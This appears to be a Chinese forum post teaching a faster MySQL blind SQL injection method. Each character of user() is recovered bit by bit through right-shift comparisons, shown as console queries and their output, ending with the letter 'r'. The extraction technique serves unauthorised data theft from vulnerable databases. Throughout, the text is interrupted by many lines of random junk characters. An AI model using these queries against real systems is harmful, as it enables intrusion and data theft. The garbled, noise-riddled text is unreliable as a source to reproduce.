关于通过对8bit的ascii做右位移提高mysql盲注效率

admin

通过这种方法我们只需要做8次select来确定一个键值的第一位或第n位

* |$ j1 `' c' U# L5 i) l+ c

下面将以查询mysql数据库当中user()的第一位为例:
* u8 K1 @# N/ ?
2 X( m% ?5 k/ \; M( c% D/ E# [
6 x& O% L- ]) j5 Y
ps:第二位,第三位依次类推 select substr(user(),2,1) mysql> select substr(user(),3,1)

6 D, d8 z$ Q: v6 E; f* d0 A
) J/ y  B  y9 S" P0 e
$ \$ i/ w# Q- \  `5 i; I/ |: K" a首先执行如下sql语句:

6 n3 E4 p1 o8 @& d; B
1 p" w1 a' d' o
+ ]! k& X8 O3 L* O& Qmysql> select (ascii((substr(user(),1,1))) >> 7)=0;
/ T% i+ J: \. J  Y) ]

; ]: [. V' m; U! B1 s
我们将对这个8bit的ascii也就是user()的第一位做7次右偏移,也就是偏移到8bit的ascii的

/ b* ~" B0 }; t* o! x
8 i4 x: D# |* B& E6 M
第一位并与0做等运算,如果,运算结果为0 说明第一位不为0,也就为1
$ W( B% |6 K9 F  j( O
& u# S( E' ?* R9 X8 ?

如果运算结果为1,说明第一位为0,不为1
9 M; e/ A+ k5 ]. v1 U2 g  Z* C
6 b' Q" D4 o5 t/ U
3 w7 P2 y$ b( B1 i
+————————————–+
# }! s8 c/ i  ^6 [& C+ _
7 h. S! d8 n. J" a9 V% T| (ascii((substr(user(),1,1))) >> 7)=0 |

  o. ~. ~+ N7 @7 s4 }9 U* W: ^+————————————–+
$ E: @4 M8 w& u, x
| 1 |

4 ^! ?8 p& @; U8 H# z2 [$ l/ r+————————————–+
4 a7 b+ T3 S3 f' V9 X, f  Y
, |. w/ D$ r* ~% K7 X6 `1 row in set (0.00 sec)

这样我们就确定这个8bit的ascii的第一位为0

# E4 i; F; F/ G, Z6 D1 f6 b( V

& Z- o% }: ^/ I, S0 g$ S第二次我们来做6次右偏移来确定前两位
! f, k$ s: e( |! m
9 o8 b* l7 Q3 \/ H/ T; l
8 \" d& E7 i/ S/ |! d- V/ R  J
# A! ?+ N! z" Z8 d前两位可能是01或00,即依然可以与0做比较,

2 K' M6 o3 J! q. h: f+ `mysql> select (ascii((substr(user(),1,1))) >> 6)=0;
2 a1 q( y, Q, D/ ]
+————————————–+

% J# H; M( F: g( {; a| (ascii((substr(user(),1,1))) >> 6)=0 |

+————————————–+
& O8 B+ G' K! [, H4 O7 W5 q
2 R* V2 @% r9 s8 m" K| 0 |
7 {3 H' H5 g* @' H( x  P9 l
+————————————–+

5 K- @/ h  Z9 e1 row in set (0.00 sec)
, V4 l. h* G5 {& k/ \
' [! S# v+ h! _- j* T
/ z4 \6 K5 A6 B0 r2 _
  v# N/ q9 r: T. J' w结果为0,即第二位为1
# F& P) h' C7 N& v4 I& ~+ e0 E

8 ^8 L) _. u3 ~7 [' {. q
9 T) Z4 z9 G$ @& G8 b7 f. ~% o- r* `! O开始猜测前三位为010或011

8 Y, O- Y  m7 m2 u; y
7 O$ @# v+ E1 P. P( b# S
* v$ u7 a2 r6 ?& e. v让我们看看010和011的ascii码是多少

2 R6 X0 E8 ]$ q! S1 W
/ G2 ?/ m9 V* j0 W5 U; Z
分别查询select b’011′ select b’010′
! _( U; [9 {" S8 k$ Q
" A) j0 S4 F. j- x
: u3 f9 o- |6 o/ [, |5 {9 ^* L
5 C0 ]- t& E9 w, j7 c. m/ J获得结果 010 = 2 011 = 3
5 O* n4 a2 m+ D) |' f

; e7 }2 ~- S3 K) z7 q
执行如下sql:
4 r# k6 B! a- Y. ~& z' ]


mysql> select (ascii((substr(user(),1,1))) >> 5)=2;
6 z# l# t6 z% z- C+ K3 ]2 _" A
0 E* z# J5 ~% _2 L& W, p$ D+————————————–+
" [" \" H9 ], O5 q/ i
| (ascii((substr(user(),1,1))) >> 5)=2 |

# j5 t" {' z& i8 A4 Y9 Z+————————————–+
: A# A; F( t1 K' O
| 0 |

( }1 B3 U$ J3 k4 m1 T$ B* D+————————————–+

  z( s" |5 F- H3 }& v- a, k4 w即前三位不为010,而是011


6 i  D' u; z6 z" ]' ?4 W0 K8 g
( o9 f4 Z% x- E+ p& D直到获得最后一位
  Q6 K1 V# |: V6 t$ h6 D% r) G1 r
. v4 \2 M2 `( @' _5 S6 O
" I2 S  Q8 K: d0 W
6 V- ~' ^5 `" M& J6 H6 Y最终结果为:01110010
; V4 m& _. R9 g0 r2 K3 [5 _3 {
, L( G1 [8 A, p4 Q" D6 ~
8 d/ j! a, _4 k6 Q/ }% x6 a+ l
+ }- N* i3 b8 Q转换一下:

& [6 ?. E+ |0 k; G/ v' d: V- h

select b’01110010′
0 y5 P) a# O1 A
/ r& @- N3 u; }

查询结果

5 \% G- s& ?( c( }

8 h+ o% c2 ?8 [( L+————-+
( K6 s6 Q/ h2 _$ E2 @& ]
| b’01110010′ |
* x( v  y/ \5 Z+ e; u5 i% f
# ?1 Q  B) y" Y- C8 ^4 ]$ s) f& A9 Y+————-+

7 G1 i: ^& q( L| r |
2 a0 ^7 a4 b( r
2 \1 A) W/ s0 a+————-+

1 row in set (0.00 sec)

" x; u- x3 |7 `# z1 R) J
( u& T- ], N) N8 R1 S
这样我们就获得了user()的第一位.其它位依此类推
* _2 g4 \0 p! y+ ]